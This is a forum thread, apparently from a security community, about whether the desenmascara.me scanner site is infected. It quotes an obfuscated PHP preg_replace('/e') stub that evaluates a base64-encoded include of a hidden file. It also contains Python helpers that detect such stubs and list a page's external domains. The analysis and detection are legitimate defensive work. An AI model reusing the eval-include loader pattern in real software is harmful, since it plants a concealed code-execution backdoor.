Is the desenmascara dot me website scanner safe?

Site advisor says it has suspicious site behavior, also medium risk here: http://www.siteadvisor.com/restricted.html?domain=http:%2F%2Fdesenmascara.me%2F&originalURL=-922351519&pip=false&premium=false&client_uid=2862654286&client_ver=3.6.6.129&client_type=IEPlugin&suite=false&aff_id=662-12&locale=nl_nl&ui=1&os_ver=6.2.0.0
and http://www.mcafee.com/threat-intelligence/domain/?domain=desenmascara.me
Given as infested by Sucuri’s: http://sitecheck.sucuri.net/results/desenmascara.me
Known javascript malware. Details: http://labs.sucuri.net/db/malware/malware-entry-mwjs2368?v2
6 instances of this malcode: http://labs.sucuri.net/db/malware/malware-entry-mwjs2368?v2
Or is this a FP? → https://www.virustotal.com/en/url/7e7df34622a6ef5c88e2b3b86ad034a4178c6cb25de3bc819fac10a632882307/analysis/1403953989/
and http://www.quttera.com/detailed_report/desenmascara.me

polonus

If the infection is what Sucuri states, the site has been hacked and backdoored, after which known javascript has been inserted, à la the TimThumb compromise malcode → http://labs.sucuri.net/db/malware/malware-entry-mwjs2368?v2
and http://blog.sucuri.net/2011/08/mass-infection-of-wordpress-sites-counter-wordpress-com.html

Can anyone confirm this backend malscript infection? The malscript follows:

Carga datos iniciales dinamicos–

polonus

It looks like it's hacked…

Kaspersky is just sleeping about it in my VM :frowning:

This is the code:

 <?php @preg_replace("@(.+)@ie", "include(base64_decode(\"\\1\"));", "L2hvbWUvY2lmb29yZy9wdWJsaWNfaHRtbC9wbHVnaW5zL2VkaXRvcnMvdGlueW1jZS90ZW1wbGF0ZXMvLiU4MjhFJTAwMTMlQjhGMyVCQzFCJUIyMkIlNEY1Nw==");

Decoded results:

 document.write(unescape('<iframe src="htxps://docs.google.com/file/d/0B2L8ST0QDvOjR0tvZXZ3ak5pTVk/preview" width="670" height="450"></iframe>'));

A quite harmless preview link…

polonus
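The stub quoted above is the classic preg_replace() with the /e modifier: the matched text (here the base64 string) is substituted into the replacement, and the result is then evaluated as PHP, so the real action is an include() of whatever the base64 decodes to. As an added example, not code from the thread or from the site, here is a small Python triage helper that finds such calls in PHP source and decodes any base64 literal on the same statement, so an analyst can see the include target without executing the page. The sample PHP it scans is constructed to have the same shape as the quoted stub; its payload path is made up.

```python
"""Triage helper for the preg_replace('/e') + base64_decode() stub quoted in the thread.

Added example, not code from the thread or the site. The sample PHP below is constructed
to have the same shape as the quoted stub; its base64 payload is a made-up path.
"""
import base64
import re

# Constructed sample input. The quoting is what valid PHP needs: \" inside the replacement
# string and \\1 for the backreference that /e will evaluate.
HIDDEN_INCLUDE_PATH = "/var/www/example/plugins/editors/.hidden-include"  # made-up path
SAMPLE_PHP = (
    "<?php\n"
    "// Carga datos iniciales dinamicos\n"
    '@preg_replace("@(.+)@ie", "include(base64_decode(\\"\\\\1\\"));", "'
    + base64.b64encode(HIDDEN_INCLUDE_PATH.encode()).decode()
    + '");\n'
    'echo "ordinary page code";\n'
    "?>\n"
)

# preg_replace() whose first argument is a string literal of the form
# <quote><delim>pattern<delim>modifiers<quote>. PHP accepts any non-alphanumeric,
# non-backslash, non-whitespace character as the delimiter.
PREG_REPLACE_CALL = re.compile(
    r"""preg_replace\s*\(\s*(?P<q>["'])(?P<delim>[^\w\s\\])(?P<pattern>.*?)(?P=delim)"""
    r"""(?P<mods>[A-Za-z]*)(?P=q)""",
    re.DOTALL,
)
# A quoted run of base64 alphabet long enough not to be an ordinary word.
BASE64_LITERAL = re.compile(r"""["']([A-Za-z0-9+/]{16,}={0,2})["']""")


def find_eval_preg_replace(php_source):
    """Return one finding per preg_replace() call carrying the /e (eval) modifier.

    Each finding records the 1-based line, the modifier string, whether base64_decode()
    appears in the same statement, and every base64 literal on that line decoded, so
    the analyst sees the include target or code without running the PHP.
    """
    findings = []
    for m in PREG_REPLACE_CALL.finditer(php_source):
        mods = m.group("mods")
        if "e" not in mods:
            continue  # ordinary substitution: the replacement is never executed
        line_end = php_source.find("\n", m.end())
        statement = php_source[m.start(): line_end if line_end != -1 else len(php_source)]
        decoded = []
        for literal in BASE64_LITERAL.findall(statement):
            try:
                decoded.append(base64.b64decode(literal, validate=True).decode("utf-8", "replace"))
            except ValueError:
                continue  # not valid base64 after all
        findings.append({
            "line": php_source.count("\n", 0, m.start()) + 1,
            "modifiers": mods,
            "uses_base64_decode": "base64_decode" in statement,
            "decoded_payloads": decoded,
            # A dot-file under the web root is the hidden-include shape the thread discusses.
            "hidden_path": any(p.startswith("/") and "/." in p for p in decoded),
        })
    return findings


if __name__ == "__main__":
    for finding in find_eval_preg_replace(SAMPLE_PHP):
        print(finding)
```

Run over a site's PHP tree, the decoded path is the file to pull next; a dot-file under a plugin or template directory, as in the quoted stub, is the part worth inspecting before deciding whether the page is "harmless" or not.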

Hi,

I am the desenmascara.me owner; it is safe, as pointed out above! :slight_smile:
The obfuscated code is legitimate; it is even commented. It was a test to see how security scanners such as Sucuri behave.

Regards

Better question, how should we be taking this?

As I stated above, quite harmless code when deobfuscated, and the external links check is also OK:
http://desenmascara.me links to the following External Domains:
==>ajax.googleapis.com
==>malsup.github.com
==>google.com
==>jquery.malsup.com
and https://www.blackhat.com/eu-14/arsenal.html#desenmascara-me
http://emiliocasbas.net/ via http://emiliocasbas.net → emiliocasbas.net

polonus
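The external-link check polonus lists above can be reproduced offline. As an added example, not part of the thread, here is a Python helper that collects a page's `href`/`src`/`action` attributes, resolves relative and protocol-relative references against the page URL, and lists the hosts that are not the site's own, together with the tags that reference them. Iframe sources are included because the decoded payload in this thread was exactly that kind of reference. The HTML and the `https://www.example-scanner.test/` page URL are constructed for the example, and the Google Docs file id is a placeholder.

```python
"""List external domains referenced by an HTML page (added example, not from the thread)."""
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# Attributes that carry a URL worth attributing to a host.
URL_ATTRS = {"href", "src", "action", "data"}

# Constructed sample page: a few same-site references, the external hosts the thread
# lists, a mailto link, and an iframe like the decoded payload (file id is a placeholder).
SAMPLE_HTML = """<html><head>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.9.1/jquery.min.js"></script>
<link rel="stylesheet" href="/css/site.css">
</head><body>
<a href="http://jquery.malsup.com/">cycle plugin</a>
<a href="//malsup.github.com/jquery.cycle.all.js">mirror</a>
<a href="https://www.example-scanner.test/about">about</a>
<a href="mailto:someone@example-scanner.test">contact</a>
<iframe src="https://docs.google.com/file/d/FILE_ID_PLACEHOLDER/preview"></iframe>
<img src="images/logo.png">
</body></html>"""


class _RefCollector(HTMLParser):
    """Collect (tag, attribute, value) for every URL-bearing attribute in the page."""

    def __init__(self):
        super().__init__()
        self.refs = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if name in URL_ATTRS and value:
                self.refs.append((tag, name, value.strip()))


def external_domains(html_text, page_url):
    """Return {host: [tags]} for every referenced host that is not the page's own.

    Relative and protocol-relative references are resolved against page_url first;
    the page host and its subdomains are treated as internal.
    """
    page_host = urlsplit(page_url).hostname.lower()
    collector = _RefCollector()
    collector.feed(html_text)
    hosts = {}
    for tag, _attr, value in collector.refs:
        if value.lower().startswith(("javascript:", "mailto:", "data:", "#")):
            continue  # no remote host to attribute
        host = urlsplit(urljoin(page_url, value)).hostname
        if not host:
            continue
        host = host.lower()
        if host == page_host or host.endswith("." + page_host):
            continue  # same site
        hosts.setdefault(host, set()).add(tag)
    return {host: sorted(tags) for host, tags in sorted(hosts.items())}


if __name__ == "__main__":
    for host, tags in external_domains(SAMPLE_HTML, "https://www.example-scanner.test/").items():
        print(f"==>{host}  ({', '.join(tags)})")
```

Knowing which tag introduces each host matters for triage: a `script` or `iframe` pointing at a host the site does not control loads code or content into the page, while an `a` link merely leads the visitor away.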